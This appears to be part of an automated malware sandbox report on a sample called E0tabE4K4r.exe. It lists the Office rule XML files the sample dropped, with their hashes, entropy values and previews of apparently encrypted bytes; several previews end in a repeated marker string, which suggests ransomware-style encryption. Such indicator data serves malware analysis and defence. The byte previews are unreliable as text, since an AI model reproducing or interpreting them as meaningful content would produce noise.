                                                                                                                                                  Preview:<?xml.....t... ...C..Z.5U.k...].k.........U.q.....B.@/.rI'....8.K..........9......F.....#'T\...J[z...F..08.V....1.t_=.h...].y.4.?..<..\..Z.[D..B.V.$.(....oo...z.K)k.n.R2d..@.4f....11....P.p&.,..P.m>.@8...Lz.1..\....x.M.(7%.......7o*.Y..%...H....;...7d.....G]+.u...\..I.......u..Oy..:.X.U.k.<.....B....,K*3<.8k..hKUG..'M.....n...alp...A4./7h~.h.2w..]..L......j....-.Hm...,.bv......I......6..]..,..M...).`[.yXn....{.f.. ...).9...m..+<j.MD..ME......7W.?M...-g..Q......7g.JQ_.>6l.1.N|.&s7.s.&h..mK....2..ESPY.....`.W...Z....<...g.*..F...wj/...gq.<..8......'..<.l...z...D...%.!Z...j.#m..r.....z...!.l0.*c.dqV..B..P..Y.O...?.S.........g.o3..?,%{.@....TV.;=.U.....\f..k4. .........b.H.P....KQK.%Ll.$e/...M.*..~.Kg..mN..f.....P(.v.U.p...CH.B8...N.2...1.......\.C..g.E..;M.5..e....>...._p..Zr.<N8.....c...Dm.MS.^._...}..b...g+*t><$..k^.Y.....1.Ybm..Fa.Mt.....eP.....C..n.ZdC.M.U..E.X._F. .......mS.........\.s...`.Y..K7=.c.......X....o..p...,..O9m6.h.....)Wb*..Yk...a..n..f

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68022v8.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1864
                                                                                                                                                  Entropy (8bit):7.899908714288147
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:eakrFJueHo8v5dGGwGqqnQcAzBu6ridg0HcmD:eakrFQeHoa5wGw7qndGxYgg
                                                                                                                                                  MD5:AD5D0D308A0AC0B9D17FFE4E6172C515
                                                                                                                                                  SHA1:C5DF60514E8F59832B0555066F2BACFE56A20CEF
                                                                                                                                                  SHA-256:C1C1EC1216A184BAC00D782A0EE77EE5075A2B1259C466053785D890F2A3C964
                                                                                                                                                  SHA-512:185BED0C112674D63DE36AF14D0CDB5FD2DD2959231D0DD6361ABB0D3E86CB566FBAF2713CFAE4BA84B4F88EED3710EB45B5FDB2D365ADC924BEE0FCDBF9E275
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..X.(..^.9..i.:V...Y.,.o.o;:........t...Q.(.\V~.../t..6..!.....+...6..a<.9.....]..A.c=.4<....o9+y.....}g..i.4.....0b....7X.ws.3...Cu..h./.G.Z..q>:.X..p.7.w"...Q./..K..-..Eh`y7.....4A..zZ%..H.1p.W.z.S....>8B+={..<.....o...U..C.?..0]7..[M...b...Ij..Qw..*.D..#1..b.j......H..+..6q.D....4.5..VU.6.......cQ.p...2.....d....C.~...D.z.dc..v;.Y.e.....h..?@.....{q..x.. Z.....~....Ms......\|...r\.V...6.8..u..%x...B...H...Y..&....j...o.N..#JT&.....#..RU.LL%G....W....o.0..WMc.tp.?:!.....h.6.n1.IPj.7.....8.GQ..S..s....ar:..G...d..r.....g..)K..e!+e....#..H.lh...9.2.#F-.t.!...'....;.....[...4G..Vs..RNyf+....)...@...{..E....|...]H_].O/!..!/.EJ..eYm......G9......V...YA..........d5. .w....G...b>..H../3WF.-G....'F....;...!.2.......b.p._.^.^...-3U.2..G...\.I.~&.....1..t"0.M.w....P=(.....6..|;.[..d...7q..9.~!..Ner.d.n..r].....6..2*.../...?....Z>.....J.......R....FZ...Z.....bR.].Q..O...0j..}..x{...~.O..B.......3z.....L.]5{.a|(....XN...>.f....r.<T....`....kkr.....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68023v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1509
                                                                                                                                                  Entropy (8bit):7.861491377567718
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:0w6Dblticsra90Ks+hMqqINM5UnI/vTynrl4PShRh5Lu2KirbPmAAJQTV2bD:9fxraWYPw/vulvh/5Lu2nrbuq6D
                                                                                                                                                  MD5:E3CEC5CFF5A8DB7C05ACC89274E5E1D8
                                                                                                                                                  SHA1:54726E5CA19020A88AF87E76B7B3A0D2F4CBAA0B
                                                                                                                                                  SHA-256:ECCED5BCCCE46BED65E3125A6AED9F210446B8F9A3BEE71518DB5C1F6BDA6486
                                                                                                                                                  SHA-512:5C3AD5223EBD5BDA94EC1D4BFA9B1F55A1903E92F7173B635343652822DF3766C8BEA0B3B2CB5A21D32847576364ED1B1D2B2322A6D29B51BEEBEE7581071B9C
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.. ~..1..M.t/..b...B..bvv.]]S.Nz.....+~.Cv..GK.:...f..fYp..O8.'s..6.0.d....7.qA...tI.....'g-P...`..z.b.M.).(... ..&LPU....C.=1.u.\.V.6..c."h<W..7s....@1....!.[..._.....5...~.Z'.....I.;..q.w-E."X.(Rr..~N.<..V.,......G."..>M....[JST&9...q4.'.k......N;A.B......=.^...^...d..gR....g...h)..N.r...\.D_..Y...6.T.zW...0..2...9?..A...S}..2g.\.M....1m.9.,?G..xSA&.. O.W....E.~..H.JE...8. ......:.,...................n...v...~..7. ...@.20T.....g...;Khh...].fRS"H......+.+.K......E.:.G@o....{.S1..d..>.g...q.D.gp.~J..P..E.[....j.gX..8...|.6.b....Q ......p.[..].......{x...x....?..X.a{.)..[k..-..[f.&]O...$;/..)e..dQ..i..E..........7.%.p...B.B...-...'...X.J..'........)O*4..... .6{=./....J.....q.5.-D.[Dn.;o...[...6..{ ..-.g.j<....u...q-.&..`.1..?t.L#...-..#o|.......q.g,|_!....e.....'w0:.%2<X...t.O.....................X..s.t{........A.q>.0......r...;1...]..$.q.....v...V.....?..D.......7.c~p....O?..&..{A....!y_.._2.Bg.....6b...n|.;..;.&...I...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68024v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2007
                                                                                                                                                  Entropy (8bit):7.900749997621499
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:n/zZsYM/uefmaijFDoiIRedURJB5p8/cf/eP+42D:/zZsYkue+TjFDSeqvjp80f/es
                                                                                                                                                  MD5:BAFC6E4DA673041A18881FE66EE269F8
                                                                                                                                                  SHA1:FAE28B16B3CCC626D52D9EB1412146FC80A6B907
                                                                                                                                                  SHA-256:5C6D622E285E8827ED7738D6E965CA43F630DEBD935DB5B84AEA34CAEFDEC518
                                                                                                                                                  SHA-512:B86771867C0B2053DEC4FDC7AD112D1BD0F831EBA7498612712D67734A7FC6F454AA12ADCB0AF9F5EEDE35BA3CE2866D9447AF475494F79C183ED17D8DA213A3
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml.....7.....40K.....k..i@@h{._..M.6Y.D...Uy.N....4=U..c......}6.....WZ4.._s.,..%...=530.........egS\d.....w.X.3=n..D@~.D..#:_...Xv.};...>.{....".U...G+_U.X..=7W%Y.Q.o.m......d.ZHA..8...%.&\..N@iZ..$.....O...4j.Q.]...A..JWf..."..M...-.F..T................A.;.B.4l...H..t...Q9. ...{nt..j.GM.].&.(.'|' ..G.+......n}........&...JkS.?q.);o......*.mx..~.7.W.[ET#.......R....vs....7..a..7.........}f..B..I.B....2.......X...\.8.6G '(7g...?.v]..B....4.'faqf..m.d;..........)z.;....=^...Ofm......%..>\..h..K.=......r.i.6.!.(...h7.*~.[.<....:..._!.zwp...P..$d..$...8...J...kr. .,v....6\v..F1.....\BOP.wgA...`.g...9.I.......0.|O.k.<....|P...u...UP......D.|.).N..P.......36.Q.}.pR:....Z...C..4...w.&.e-~I.....E..Q....0...c,.../.h..:..t8C..F..\.d?.x...*....zk....b.,X.1..5m._...~...<.. .$..6.S..5.bY..!..\.2..s.....l.....I.[...c....3AH8>.MR.Gr.qR.z.C...t.....|p....+....S...........\......u...O@..^....N...K.K..w.a4.s.E#...e@u..Q..@.fi.St....?.O....79...P/..g*

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68025v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1276
                                                                                                                                                  Entropy (8bit):7.835372956511235
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:PUclT2X+LPlH14Jom7ku4Wpb7VgHWoXxRwe8qDN0CtCnuv8ZPWNFqDGQDZ2bD:McR2XFomwvs7VgHFRwLCtIANFFQuD
                                                                                                                                                  MD5:C50E72AA9EC2B4CDD809410861070433
                                                                                                                                                  SHA1:539382D17CDF9E76338EBE1A32A102ECBCE90523
                                                                                                                                                  SHA-256:A5A63C0AFF2E4A8FE2624B58D82DE8ADC864664B01B874BAC364FFAEA6A58ADC
                                                                                                                                                  SHA-512:76004951928BB15C77921B2ABB5A0E4476662B95AC5D991C7F7FE9D52E3EEC876A970A1E5DF4116D56636F7F5967944AF25ADF041EA3626B8544212B43F2F3A8
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml3..."NJ.....`|Ws.l......:tT....(-.t....a-...EXo..b....+....2..xQ.o.3.LAYc....,.q.....^.}z?....#.m.*....]S.B/..JA.....U.a.y......P.x..]..B...f.!.z..-....(......ee..H..y.|...j......U....5(~F.?...d.M.\.9...m.C...w+..E8...*.ws.e0h.er....5.._.n9...]..u.,V.aK+.@h2..{..rj......riT..wW.a..e..?.....k..k.c.?e!....?Je.\zg).gTD.S.n.....2b....x=.\.=..........Y [.1.pS..XB..._....j..........nIN.8.m.......{.# ...W.X.p:c!H.38.U...SK..V.K ......Z....#b..F...OC/.8a;...........x..._....j..=R.%.4EF2.nQ.\.......\........]....u.r..|....Pc...)k..8..Il..[..wAW..A...,|"..T.[.....$/].F..7I.#0..-..RwB...`M(..{.%i..\......+.I..n...g......$nl..^.]...}..?iW.S$.I!...._.c..j........-...@Y.w#R.nM.q..N|..'.d/...3J.....iP'w1c.a.T.T{...nO5...Xw.,...........yM(.[.).A(.vm~>D.o.zXsxC...Ch.&..G...B..bX.5..a....h...s....t4jR.._fw..$"3O.F..M.?x/......g..F..uR.J...A..wGC..1...w.=O..-5......A...E._.q.q..4.ds..D6h..'.b9N.K.....`.(..<...6...'yc...)I`..v...|7.....m.*.....@>J

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68026v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2037
                                                                                                                                                  Entropy (8bit):7.906748198344054
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:cOVb+ld38/6bpw3MMk0okEzsA91XcENMGAAA8s87nlGZsDnYhs85ll7ijmI1tB5w:cOAk/W4M96wXcEXAAAR8ckWssejmVD
                                                                                                                                                  MD5:8BB43460CFCBA7F59B41203572BCC039
                                                                                                                                                  SHA1:E5444D2977D37C6C74B37FB14436A1FA7DAE21C3
                                                                                                                                                  SHA-256:D4F6ED8D94B09C99CC143F97A0E381F9CCA448A1DB1A092AC47B5974BCF41A71
                                                                                                                                                  SHA-512:7847D09710AC06FF2924BE81B6C79CF981C18342DEAA4E2BD875E508831B25F104BA1ABFE3C55BE4D9FA2EBCA5B7ED063AD934778CD0251732128F5ADA810565
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml......#...n..$.1=|....[..V[.?..l.n...?...K...82."...E>6..'c...d.[....e........I......+.x8..\.f...8..........6w.04:.1`$My.....q...$....d...&=q.Z3.G.y.....>..(b?..jU...R{\1.}.m.*3...N.....~....5.......CN...y......2....J.....].i.i..7*..B..*?.c..~M.....y...0..Pf.....AD.&^..h(...D`.}..%.#BlS..,f@H....&h\..[.g5.....{Fct...9B....l...y.,...K....d.=..9..ne.o...=...u[..R..........g.^.{3}....e....W..a.^.pF.5.g..D..[U..<HLdy......6..t16|.g..L^.........$.5t^ .l.[.T^t........PZ....s..U..%)..m..).Y..5.9,....Y.....87.N.Z..'.b.q8..~..........a;..C.9.....x......2|s....w........c.:u.iI7w&..G...z....I...o....w.g.{o...a..o....'W2m.m..4px.q..@N.+Vi.H-..uz3..r*J.]......\...fi..` ..hx.3w.w..{.@O.?.~..6].+@k.{.?)}.....)...k.=d..x.c..>wv....~g..tmL.;..$.5..,.m..v...X..*Ta.-)U.k..rk....CN....)..f..Q>8[VM'....]r..9.a4.@....7&.r.}.x....`.2L..).9.....Anj..GH.<......U..N.y.9c..nL..p..B.m+.j.a....+.z...~5..H7d.d..EL.....a.0.'N.UW.nf.l...v....'.b8.....+|3n..

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68027v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1180
                                                                                                                                                  Entropy (8bit):7.842291968809982
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:gN74KKRwYCuF0b3wbTv/QTLXFH+zaqtUuUJt+ij4zajM7T72bD:gN7jKRwEF0rwHHAFH+JUPt+ij4ZToD
                                                                                                                                                  MD5:54A007A69F29A34F77B195287854636B
                                                                                                                                                  SHA1:9DFCD5082BC179C995358426B7E613CE08A2ED0A
                                                                                                                                                  SHA-256:60A2820B78BB7D7F41C09B380F60E950E24DE15D26EB992A3CDC423E9486479F
                                                                                                                                                  SHA-512:8EB12B2B5BC3DD988E92ACF276162C9F6BF25ABF000744243B90DE8C034671A6FD8A949A5687E5B2DD670EFF811258F69CEF7E1A5809A66552D435B2C34F9C9B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml].& .;p...F!,}~........U._.|.:e...x..[{..~_.-R....3.H...J.i..:....u...X.l.....u.X.L~(.].q.Rmql2.1...oZ...r....<...[...H-.*m...`..).^.i.E......sc/..'.s.........W.w.=...(.4>.y...g..S........i6..]....... ...u,R&..`L.Q-q8........'#.8n.ok..m;...O.~......N^..g...N.[.....6.c...+.I[.....h~.iS..[l..u..}....M2.YC...3R.T(.....D.5.".V.,BmQ"%.;yi..y.l8..U}.$....}.......%E..........P2Y.8.p..a..`.......{.......O...._.9...,L!.5.L...........[..C.......i...O.j.....E..j,..9..'..>.p\[.\h.FH9.o.Q.`..9M.8.:[V....k$71.R......3......O..wCS.C..S.,o.+..;.w.h.L..@......A..7...nT`(.....]...Q.m...V$l....%.8.u.?}7.....ER.tE.'<..G..8.x!.6&5..vr..-..Y...(Wb....j.Vb....D...$2..>.7s....;..ds=_.J....F...>+".....1..>....5.!.a3={.>.....57.....p..Q..*..N....V.S...{$K...C Pej.U'.#.J.;...J.em...-I6..B..e.....K..pO..-5A.F..[A.O/#CQ.8f%l....(......&.....cz....z..o-..w...u.f....a.~....V..6.....1.cz]..m[......r\.........t.qN.?t._nUr_.C.fT.....V........kcM...*.1.{.....#.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68028v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):899
                                                                                                                                                  Entropy (8bit):7.782457319416514
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:1UJjGEtUmIDMERwlOd/4VoxqFyKz0w4JOY2bD:1Ki9RYOh64I4TID
                                                                                                                                                  MD5:B4317730F2AF3F8FD99AEBE5A283332C
                                                                                                                                                  SHA1:31AEF755D4CE8E85DD9CC2F6D5DE583FEF5107FB
                                                                                                                                                  SHA-256:7884D47613884E2917D1DCC437581C3DBFDA061E1066227E533CBAA2612DDA43
                                                                                                                                                  SHA-512:215CF8928F83D983722A00AEB6B0FF81588304985313294D6F54034F82A851337F548D19D4846446F7ED7D40003C40F2A7F692E27787BB748BC7AEC9EDCC21C1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml....~..k.in.p".l..45M>..JW..-...m.:....L#.....lN...-..../..RZ.....*..O4.j..;.%.{....U$.z......W4VCA..........B....<.5.}.b..d...Lz.. =......?...x.7kT.A.K.#?.........!D::.%.DHY....J....tC.%.....c..U.e..K..i..5.p...F...../...5.....n...I. 8.=...^.I:.1..-;..i..5......{..B............4=....y..k..L..u}.....Q7..b.^"...A.w.....@.C..w...D........]%I-L.........^.N...}9<..$.1/,7..em.x..O.....2......t.l...*...PM0.h.../Y....k.........U..2;=..j.R...q....] 0"..`..&.........K...v-y.l.a......R$.*{.....l..9...!..}..YH...2.?.J"m|..I[.....T4Ye......q....IBn.'.d...*......O..&........Q......u.......{..E.D.d...Oo...m..d..../Ca...L8..b...;.....<R...E....6\..F./F.5v.qN.Me.C0u!XX}...4k!..V..{.{Eo.H.o..........._l....t....3.j...N..v..Q_.Zo...7CD#B....^...q$..-.uCx..K.BG..m.(.+.'.D......en.X..G3.4.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68029v2.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2224
                                                                                                                                                  Entropy (8bit):7.908037019270353
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:fQZNSyfNq2RcjCGeKrl01UBGSnbInZdOwXPbYLXCD:Iuy1qKceGeai1UPnbcZdLiK
                                                                                                                                                  MD5:CE0739453DA10CB56E9A1BB4AB87BD19
                                                                                                                                                  SHA1:9DA5AFF7E833D78AB2266B1EE3FE5A52F5F8FF21
                                                                                                                                                  SHA-256:760F1862DB7849F4FD1FE91E05F144A8A6815B08740AA775CBF9F4F5A6F31C85
                                                                                                                                                  SHA-512:4F5BA20AD0E8FBD832B138705DB1DF6435F8BAE9F9A63E4B748D2444F98C1951E1A076FBB9E0C2F340E81AEF85A94C1077E632DCCFCC09D6E4A747BBE1A6A2E1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..z..H.r...&A../..5..j;.d..0...a.:M....`.q.n.....8...V..bCR.O.......3.L*.3......+.a>.w.#.j.2..#O...k.#^e0T...".gT.... 1.^.}d......0%.B...S......y....,e...D...b..C..^.t......\...}..RM...0[.5.}.."..m....R&N.s:..`..-..W.k.T..Mb..7.|*0.)..7.me...z.V...K..Q......N....A.}..L.Q...8}S..?|......V-|I...<jg.......n[.I.......[.q..3+O>.m....g..R....a..!..E.tw..W#L:....~......[.g.....#.^To..V(`U.`.Z.M.`Uq..|F~..|:%..O5h.8.MX.~.0....Y.2.a7.qJW.K.U.0z.2.<B.43.u.{...nI.eg.,..~>....V.s_[V.(=.'.LP)x.M.|.1v.....r.|...]].Cl...X.l.6....6..V..s..)2.WyC.dd4........j.N..y.&..2?.M.K.........d.E..oix^t.....m.d....o......._...&T.-......T....+M3n....X.iJ.....?..Ta.q...T..y.3..R........`....g.-..p.".(H...!;.t`*8D6.X~"8|GZ..4#.6!.1....MJG2^/e..O.a.....w...u...4I.Rv..bb..c!;.fk.....`:V..O.`.n.@u.^.-..........).-.*...*.....0..i.*....d=#.H0.v....h(iNv.....q..3)c....3._..FN.&v...\....Qe...R.S..m...j^..l.i.`/Ou^A+{fm......@Bx.../.u.g....' .R..G...f....u......d.

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68030v6.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1560
                                                                                                                                                  Entropy (8bit):7.8737919424742655
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:D8r7crKyS1bE1vsWHBgA1KEbDknqYmp9VIqqwOjq7idI54DAuqkVNzTVSHnN6M2X:D8soE1v3gYLbDIIVywfkI54cBkf9W6fD
                                                                                                                                                  MD5:F81E2B7E96A193EE1DFB4DE72EB040C7
                                                                                                                                                  SHA1:56C25EFD8158BF9D9D855D845AD7A3BFB728D1B9
                                                                                                                                                  SHA-256:66D5BE131F22F26F8117F0D9ACF9B172E7E03865E45260FA324255F80D6FF250
                                                                                                                                                  SHA-512:16193409D4EC07F07EDA98BD3CAE9991C4BF0B3D78E485C2224D0734442D572282ED10760BCA0A7C75DF905557E783F855EE525156DC7FE770E01F39417A7AFF
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml9.C.!:b..2D~...J ..g..z..)-5.5...MU.+.....xv....r.5.'n.a.....{.....j.Z..WiV5D.........^...e....0.:.....K].d.J..2......^.@#..ww.c....YA...]u9_*..P!-..E>.2.0.4.$.0W..n>....o.l.[..Uk....s.,....} Zq..4b>.[G..n|.|.}x>...R.q...d.LT......G.o....U\wfY..'%?&>.+.8D.4.R................a..e..x..6...O..X.1.[..q..IE.."xg..cK"......).V.x.....+...c.f..P}..w.`.....RA6m.q/0f..j../.J..-........;..P.jd..e..'..?...13.A*.h...o....+..y..)..2.;..F..... .....=.dook@.v......j?..v_.. .^..E...I...+..m.X..........@....5..s.....9..B..wGM.k..6.d..o...[.I...2aa.v..;....i.9.........A....)d ..\.v.....(k.=....q.:V...a._...\1"T...(.0.7.....ZO..."..\..S.....n@.}...g..../.m..r......?.G7...G.l.%.j....k..Wd,u.......\l6pa..z...z....U6..W..P..=..x......IgX~....m:.'......O.x&...|.Y.6.)....Bn&Y........].._.g..#t'.l...o.Y@.fk..m...&.E...H.t..8.v..V.t....<`.=.V.......j..kr.G.I.Pm(4.M^...*.K?Gf.c.E.D)l..Tm...l._......5.t.....V.r.~q$......8.W..k..9z..a.....<...72..6M.~Z....

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68031v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1206
                                                                                                                                                  Entropy (8bit):7.833017584366521
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:SHmd/wyKwUWixcq3r42dLF0pTjJKX2xRo066/8e1gar/cDIdOYSWPD54frjUn+WJ:MTwwN3U8mEdE8emar/ccUYSsIjDWhD
                                                                                                                                                  MD5:42763AF832E261B93FB11A01A4FB473C
                                                                                                                                                  SHA1:D245BB4CEF07BCA2C91A061A563455F3EE753DDE
                                                                                                                                                  SHA-256:9DF924DD867FB8380851B8BB1E1DBE834326B0F45F56DDAD113AD143D23EC1F8
                                                                                                                                                  SHA-512:125198F8507CAF9557C6DC6D8656A062B8B33D693E6311184263CA97A9ADD1B2B055087A0AFA91A9C5804A4FA0844B1DF17591712D82C3BF575F7B5008BF4F14
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml...>7........J.C...,.g.'.h..l..19.%II..yx`.R_...,=\.".c.....).`V$u..V>1G....Cd.....|.......!......Y.......k`....=(!i...y5.(\...J.S.....kB.h.U..Nc.A.......YO..~P...XZY*...G}i..k%."..x.o.Y.i....x......?...G.v}./..H.)/JK..4...=...|m....p.s..it....J....h.J....O..QF%L`.}Lv..<.y......<f.-.qz.0.jG.`..mE..]G..%.&6?..)AZQ........8....b\<4R...i..p.C.$..T.-.".......V.Y..Y4wcZx...a'..z#..q.=...|.u...ww;'.in..zM...`..9H.r.....F.:sS.vV..4OnkJ3..F.&p.9....O/..=sa7~...D..#b...N.'.H....W.-.....DM.. .3..J..bp.ri.k...V..../..n...p..i...>...4.N...p..v,]I~.L;.7......>.....Z.....I.......0..>..0..&Zz.D n@"(I.h..U..b....K:.^.U.0...........O.....1.T;%..l8..{.g.P.v!.0.#.g.a.:bn(..r.j..7..H..iM.:P.3..K...t..../8.>..\.Z.......3...C[.s.V..^-I,&o(.h.CPnC....m...+...d.....(S:....)..h.E......l...>_.6.>u,.z..I:...P..................*..3W..W.u>..k=...L..+Lw.e.....2.O....|e`.......!...~U..&.........Q.."..5..5....T.K.+W.],....^.f..z.......WH..C...#.9.,..X...

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68038v0.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):738
                                                                                                                                                  Entropy (8bit):7.755138351212624
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:4/dtTMLFlqrcby479EMP97pWdqK+/JSRCyIdm4lzGDlkB2i1uYAWLra31MSUdNcq:4gRhd7ZcdK/oBlUGDlkBCYHLra3B2bD
                                                                                                                                                  MD5:1B5D02FD02C0CCADCE67E132BB2BB7C3
                                                                                                                                                  SHA1:67536E07C550C4416C765014F9C572D5FDF6ABD9
                                                                                                                                                  SHA-256:6E2386C25B7217BAF19384E069BB447126E49179FEC14C39B30A19E2755934FD
                                                                                                                                                  SHA-512:504915861F41D683555A57037FEDEBA6F028185C227783FD783E1184E08D9419E1E9C2F94088240F4540B9A7FC7E101DC0D9EF2B3F6E4BB06B992597AE65BC90
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:<?xml..#.|....>..2.S..r..Z..e.U....D.....]!..ISS'.g...3.....Zfl.0A%...}..i.p.#..f..M6D..v.YE...d.s...H..z..X..>I..HR..0...|...<.....).N..}-.....C/...=....-.').G.....is..o&.%..h"K#@T..mZ.R.SU....}.k.7W(QL`........Y...K.6^....r..k2....-~p...?*0...e....3.vl.jP.d/[....R.3......*.0^...xQ......&q.tAL.."i...W.Fp...z.>.8...?.Q...|F..Q...(}..0......Z.% ..W.=...[.......3. R.2&..'..*..ADW..c|:..L.rO.....,.5q=.Ir;,"..5.....W1......i.....q.;.....K.....T...M.i].>)H...r....o..&.2=z..+...8u....;T..'..c4.`<=cv..l...m,.7.X.X*..<.j....2.f..2|S~..!.u.q.......Zp.(.).lP.O...?_....U.l.#..Cw.=.!...r#.+2,;....p.?...*t.....W.PHmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule68039v1.xml

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1044
                                                                                                                                                  Entropy (8bit):7.796152612572663
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12:oO+d+JKuWWFFCgyNXwBVP9uZrRR5NIDpt1VV3THJpUQouzBgvL5yeg46g7cGZlAT:p+xhQzP9uDODFsEWF+lMW5mP6u2bD
                                                                                                                                                  MD5:EA9B6209357BB34FF1D27A61333CA6ED
                                                                                                                                                  SHA1:6978261967D63EF6959B5FB39AAC84CD69E165D5
                                                                                                                                                  SHA-256:A4548A04B672B75ACC8091FD1DBF1F4C65F2817BC29F114DA689567D5F6C85A5
                                                                                                                                                  SHA-512:1CF5A48B86B912E91BE3FA9FB347812E2639DE9F724639633A1A01F3C914410D30EADCB0FCCE0603AC5122BCCDB8C3A2CD08E908F62AFBCAEC04AA2CBA151A57
                                                                                                                                                  Malicious:false
